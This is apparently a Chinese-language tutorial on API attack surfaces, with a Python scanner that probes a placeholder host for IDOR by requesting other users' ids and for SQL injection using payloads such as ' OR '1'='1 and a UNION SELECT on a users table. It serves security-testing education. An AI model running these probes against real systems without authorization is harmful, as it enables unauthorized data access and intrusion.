API 攻擊面分析
API 的六大攻擊面
1. 端點發現 → 找出隱藏 API
2. 認證繞過 → 繞過 JWT / API Key
3. 授權缺陷 → IDOR、水平/垂直提權
4. 輸入驗證 → SQLi、NoSQLi、Command Injection
5. 速率限制 → 暴力破解、DDoS
6. 資訊洩露 → 錯誤訊息、回應過多資料
Vibe Prompt
「幫我建立一個 API 安全掃描腳本:測試目標 API 的認證繞過、IDOR、SQL Injection。」
import requests
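class APIScanner:
    """Run two HTTP probes (IDOR and SQL-error echo) against one base URL and collect findings.

    Findings accumulate in ``self.results`` as plain dicts (``type``, ``risk``, ``status``
    plus ``endpoint`` or ``payload``); ``run`` prints them. The file's module-level
    ``import requests`` is relied on for all HTTP calls.
    """

    def __init__(self, base_url, timeout=10):
        """Store the target base URL (scheme + host) and start with an empty findings list.

        Args:
            base_url: prefix every endpoint path is appended to, e.g. ``http://host``.
            timeout: per-request timeout in seconds; without one a stalled server
                would block the scan indefinitely (``requests`` has no default).
        """
        self.base_url = base_url
        self.results = []
        self.timeout = timeout

    def test_idor(self, endpoint, auth_token):
        """Record an IDOR finding for each sample user id that answers HTTP 200 under *auth_token*.

        Args:
            endpoint: path under ``base_url`` that takes a trailing user id.
            auth_token: bearer token sent in the ``Authorization`` header.

        Raises:
            requests.RequestException: propagated from a failed or timed-out request.

        Only the status code is inspected; a 200 is taken as "resource served", not
        verified against the response body.
        """
        headers = {"Authorization": f"Bearer {auth_token}"}
        # NOTE(review): id 1 is presumed to be the token owner's own record, so a 200
        # there is rated low; every other id served is rated high. Confirm that mapping
        # against the test account before trusting the ratings.
        for user_id in [1, 2, 3, 100, 999]:
            url = f"{self.base_url}{endpoint}/{user_id}"
            r = requests.get(url, headers=headers, timeout=self.timeout)
            if r.status_code == 200:
                self.results.append({
                    "type": "IDOR",
                    "endpoint": f"{endpoint}/{user_id}",
                    "status": r.status_code,
                    "risk": "高" if user_id != 1 else "低",
                })

    def test_sqli(self, endpoint):
        """Record a SQL-injection finding when a probe response echoes a database error keyword.

        Args:
            endpoint: path under ``base_url`` that accepts an ``id`` query parameter.

        Raises:
            requests.RequestException: propagated from a failed or timed-out request.

        Detection is a plain substring match on the lowercased body, so any page that
        normally mentions e.g. "mysql" or "unexpected" is flagged too; findings need a
        manual look before being reported.
        """
        payloads = ["'", "\"", "' OR '1'='1", "' UNION SELECT * FROM users--"]
        error_markers = ["sql", "syntax", "mysql", "unexpected"]
        for payload in payloads:
            url = f"{self.base_url}{endpoint}?id={payload}"
            r = requests.get(url, timeout=self.timeout)
            # Lowercase once per response rather than once per marker.
            body = r.text.lower()
            if any(marker in body for marker in error_markers):
                self.results.append({
                    "type": "SQL Injection",
                    "payload": payload,
                    "status": r.status_code,
                    "risk": "嚴重",
                })

    def run(self):
        """Execute both probes with the built-in sample endpoints and token, then print a summary.

        The endpoint paths and the bearer token are hard-coded placeholders; replace
        them with values valid for the system under test.
        """
        print(f"掃描目標: {self.base_url}")
        self.test_idor("/api/users", "test_token_123")
        self.test_sqli("/api/search")
        if not self.results:
            print("\n未發現明顯漏洞")
            return
        print(f"\n發現 {len(self.results)} 個漏洞!")
        for finding in self.results:
            # IDOR findings carry "endpoint", SQLi findings carry "payload".
            location = finding.get("endpoint", finding.get("payload", ""))
            print(f" [{finding['risk']}] {finding['type']}: {location}")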
# Sample invocation against a placeholder host; the scan starts as soon as the module runs.
target_url = "http://test-server.com"
scanner = APIScanner(target_url)
scanner.run()